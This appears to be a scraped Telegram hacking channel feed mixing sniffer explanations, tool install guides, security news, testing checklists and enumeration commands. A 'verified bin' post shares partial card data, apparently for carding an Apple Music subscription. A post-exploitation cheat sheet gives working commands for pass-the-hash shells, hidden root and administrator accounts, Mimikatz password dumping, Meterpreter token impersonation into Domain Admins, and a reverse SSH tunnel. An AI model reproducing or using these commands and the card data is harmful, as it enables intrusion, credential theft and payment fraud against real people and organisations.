UNDERCODE SECURITY
226 subscribers
295 photos
1.03K files
1.73K links
๐Ÿฆ‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘The meaning of sniffer and sniffer

1) Sniffers have almost as long a history as the internet. Sniffer is a commonly used method of collecting useful data.

2) These data can be the user's account and password, or some commercial confidential data. With the increasing popularity of the Internet and e-commerce, the security of the Internet has also received more and more attention.

3) Sniffer, which plays an important role in Internet security risks, has attracted more and more attention, so today I want to introduce Sniffer and how to stop it.

4) Most hackers only want to detect hosts on the intranet and gain control. Only those "ambitious" hackers install Trojan horses and backdoor programs and clear records in order to control the entire network. The technique they often use is to install sniffers.

5) On the intranet, if hackers want to quickly obtain a large number of accounts (including user names and passwords), the most effective method is to use the "sniffer" program.

> This method requires that the host running the Sniffer program and the monitored host must be on the same Ethernet segment, so running the sniffer on an external host has no effect. Furthermore, you must use the sniffer program as root to be able to monitor the data stream on the Ethernet segment.

> When talking about Ethernet sniffers, you must talk about Ethernet sniffing.

@UndercodeTesting
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘#RANSOMWARE AES Crypt. Simple cross-platform file encryption solution.

> AES Crypt differs from the previously described VeraCrypt and TrueCrypt by the lack of on-the-fly encryption; it cannot be used to mount encrypted containers. This program can encrypt the file and decrypt it, but often you don't need more
.

> AES Crypt is freeware, except for the iOS version, which uses the AES algorithm (256 bit). Today this algorithm is considered exemplary reliable and well analyzed, it is accepted as a standard by the US government (I do not recommend blindly trusting their standards, even for the Dual EC_DRBG algorithm with a backdoor for the NSA). There is no choice of algorithms and the possibility of combined encryption.

โ–ช๏ธDownload :
https://www.aescrypt.com/download/

enjoyโค๏ธ๐Ÿ‘๐Ÿป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘for ROOTED ONEPLUS :
TWRP Alternative Lets Manage Magisk Modules on OnePlus Devices
:

Sky Hawk Recovery Project (SHRP) is a new custom recovery for OnePlus devices with some interesting features. Sky Hawk is based on the latest version of TWRP 3.4.0-0, but it's hard to see from the looks. The developers have implemented many appearance changes and additional features, making an excellent alternative to TWRP.

๐Ÿฆ‘Requirements :

1) OnePlus 6, 6T, 7 Pro

Installed TWRP

2) OxygenOS 10.3 or newer

๐Ÿฆ‘Installing Sky Hawk Recovery on OnePlus
Before using Sky Hawk Recovery on OnePlus, you need to install TWRP. This process is described in separate articles.

After installing TWRP, you can download the Sky Hawk installation file from one of the links below. Place the file in a convenient location on your device, such as the Downloads folder.

> Download Sky Hawk Recovery (.zip): OnePlus 6 | OnePlus 6T | OnePlus 7 Pro
> https://sourceforge.net/projects/ab-temp/files/SHRP/enchilada/SHRP_v2.3_enchilada-190630062020.zip/download

3) You need to boot into TWRP, find the Sky Hawk installation file, click on it once and swipe the slider to install. Once complete, open Reboot and select Recovery. After a few seconds, the device will boot into the Sky Hawk custom recovery. Enter your pin or password and access the main menu. You can now explore all the available features.

4) Built-in Magisk manager for modules
Magisk Manager in Sky Hawk does not require any third party mods to function. You can disable, delete and view information about each module on the device. The Core Only Mode switch turns off all modules at once. The Unroot option removes Magisk entirely.

5) Built-in theme manager
Sky Hawk contains a graphic theme manager. This allows you to change the appearance of the custom recovery environment. You can change the color, status bar settings, bar icon, navigation bar styles.

6)Many additional tweaks
In the "Tweaks" section, you can select options for Substratum. This is useful if the installed theme has not been updated for a long time. You can also remove the fingerprint lock if something goes wrong or someone has added their own finger.

Removing forced encryption on a device may be required if custom firmware or kernel requires it for certain functions. You can enable or disable the Camera 2 API, which gives advanced camera functionality on some devices.

enjoyโค๏ธ๐Ÿ‘๐Ÿป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Kaspersky Report: Large hunting game organized by Lazarus APT
#News

> There is no doubt that 2020 will be an unpleasant year in history. In the field of network security, ransomware attacks against targets are increasing, and the collective damage is even more obvious. After investigating many such incidents and discussing with some trusted industry partners, we believe that we now have a good understanding of the structure of the ransomware ecosystem.

> Criminals use widespread botnet infections (for example, the notorious Emotet and Trickbot malware families) to spread to the network of victims and third-party developersโ€™ ransomware โ€œproductsโ€. When the attackers have a full understanding of the target's financial status and IT processes, they will deploy ransomware on all the company's assets and enter the negotiation phase.

> This ecosystem runs in independent, highly specialized clusters. In most cases, these clusters are not connected to each other except for business connections. This is why the concept of threat actors has become blurred: the organization responsible for the initial breach is unlikely to be the party that compromised the victim's Active Directory server, which was not the party that actually used the ransomware code in the incident. More importantly, in the two incidents, the same criminal may exchange business partners and may use different botnets or ransomware families.

#News
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Magento 2.3.1_ Unauthenticated Stored XSS to RCE.pdf
499.7 KB
Magento 2.3.1_ Unauthenticated Stored XSS to RCE
โ€” Full Tutorial
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘How to install RouterSploit in BackBox-KALI :

RouterSploit is a platform for exploiting vulnerabilities in routers, allows you to scan a router for vulnerabilities, as well as exploit vulnerabilities found to obtain a login and password, or to access a router.

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :

1๏ธโƒฃsudo apt-get install python-dev python-pip libncurses5-dev git<font></font>

2๏ธโƒฃgit clone https://github.com/reverse-shell/routersploit<font></font>

3๏ธโƒฃcd routersploit<font></font>

4๏ธโƒฃsudo pip install -U setuptools<font></font>

5๏ธโƒฃsudo pip install -r requirements.txt<font></font>

6๏ธโƒฃ./rsf.py

enjoyโค๏ธ๐Ÿ‘๐Ÿป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โœ…verified bin appleMusic 6 months

BIN: 5595581x20xx36x0
FECHA: 04/26

CVV: Generado
ZIP CODE: 110001
IP: INDIA ๐Ÿ‡จ๐Ÿ‡ฎ

>https://music.apple.com/in/for-you?ign-itscg=10000&ign-itsct=402x


(only verified by Us & Not created )
Use for learn
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘checkout the Authentication steps :

Test for user enumeration

Test for authentication bypass

Test for bruteforce protection

Test password quality rules

Test remember me functionality

Test for autocomplete on password forms/input

Test password reset and/or recovery

Test password change process

Test CAPTCHA

Test multi factor authentication

Test for logout functionality presence


Test for cache management on HTTP (eg Pragma, Expires, Max-age)

Test for default logins

Test for user-accessible authentication history

Test for out-of channel notification of account lockouts and
successful password changes

Test for consistent authentication across applications with
shared authentication schema / SSO



enjoyโค๏ธ๐Ÿ‘๐Ÿป
โœ…git 2020
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘All steps for Data Validation

Test for Reflected Cross Site Scripting

Test for Stored Cross Site Scripting

Test for DOM based Cross Site Scripting

Test for Cross Site Flashing

Test for HTML Injection

Test for SQL Injection

Test for LDAP Injection

Test for ORM Injection

Test for XML Injection

Test for XXE Injection

Test for SSI Injection

Test for XPath Injection

Test for XQuery Injection

Test for IMAP/SMTP Injection

Test for Code Injection

Test for Expression Language Injection

Test for Command Injection

Test for Overflow (Stack, Heap and Integer)

Test for Format String

Test for incubated vulnerabilities

Test for HTTP Splitting/Smuggling

Test for HTTP Verb Tampering

Test for Open Redirection

Test for Local File Inclusion

Test for Remote File Inclusion

Compare client-side and server-side validation rules

Test for NoSQL injection

Test for HTTP parameter pollution

Test for auto-binding

Test for Mass Assignment

Test for NULL/Invalid Session Cookie

enjoyโค๏ธ๐Ÿ‘๐Ÿป
โœ…git 2020
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Risky Functionality - Card Payment
#FastTips

>Test for known vulnerabilities and configuration issues on Web Server and Web Application

Test for default or guessable password

Test for non-production data in live environment, and vice-versa

Test for Injection vulnerabilities

Test for Buffer Overflows

Test for Insecure Cryptographic Storage

Test for Insufficient Transport Layer Protection

Test for Improper Error Handling

Test for all vulnerabilities with a CVSS v2 score > 4.0

Test for Authentication and Authorization issues

Test for CSRF

enjoyโค๏ธ๐Ÿ‘๐Ÿป
โœ…git 2020
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Remote Information Services

1๏ธโƒฃDNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit Auxiliarys:
auxiliary/gather/enumdns
use auxiliary/gather/dns...

2๏ธโƒฃ Finger - Enumerate Users
finger @
192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/finger
users

3๏ธโƒฃ NTP
Metasploit Auxiliarys

4๏ธโƒฃ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice

5๏ธโƒฃ rservices
rwho
192.168.0.1
rlogin -l root 192.168.0.17

6๏ธโƒฃ RPC Services
rpcinfo -p
Endpoint
mapper metasploit

enjoyโค๏ธ๐Ÿ‘๐Ÿป
โœ…git 2020
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
CVE_2019_7315_Genie_Access_WIP3BVAF_IP_Camera_Directory_Traversal.pdf
767.6 KB
CVE-2019-7315_ Genie Access WIP3BVAF IP Camera Directory Traversal
> full tutorial
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Random Helpul tips
> Post Exploitation

1๏ธโƒฃ Command prompt access on Windows Host

pth-winexe -U Administrator%<hash> //<host ip> cmd.exe

2๏ธโƒฃ Add Linux User
/usr/sbin/useradd โ€“g 0 โ€“u 0 โ€“o user
echo user:password | /usr/sbin/chpasswd

3๏ธโƒฃ Add Windows User
net user username password@1 /add
net localgroup administrators username /add

4๏ธโƒฃ Solaris Commands
useradd -o user
passwd user
usermod -R root user

5๏ธโƒฃ Dump remote SAM:
PwDump.exe -u localadmin 192.168.0.1

6๏ธโƒฃ Mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords full

7๏ธโƒฃ Meterpreter
meterpreter> run winenum
meterpreter> use post/windows/gather/smarthashdump

meterpreter > use incognito
meterpreter > list
tokens -u
meterpreter > impersonatetoken TVM\domainadmin
meterpreter > add
user hacker password1 -h 192.168.0.10
meterpreter > addgroupuser "Domain Admins" hacker -h 192.168.0.10

meterpreter > load mimikatz
meterpreter > wdigest
meterpreter > getWdigestPasswords
Migrate if does not work!

8๏ธโƒฃ Kitrap0d
Download vdmallowed.exe and vdmexploit.dll to victim
Run vdmallowed.exe to execute system shell

9๏ธโƒฃ Windows Information
On Windows:
ipconfig /all
systeminfo
net localgroup administrators
net view
net view /domain

๐Ÿ”Ÿ SSH Tunnelling
Remote forward port 222
ssh -R 127.0.0.1:4444:10.1.1.251:222 -p 443 root@192.168.10.118

enjoyโค๏ธ๐Ÿ‘๐Ÿป
โœ…git 2020
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–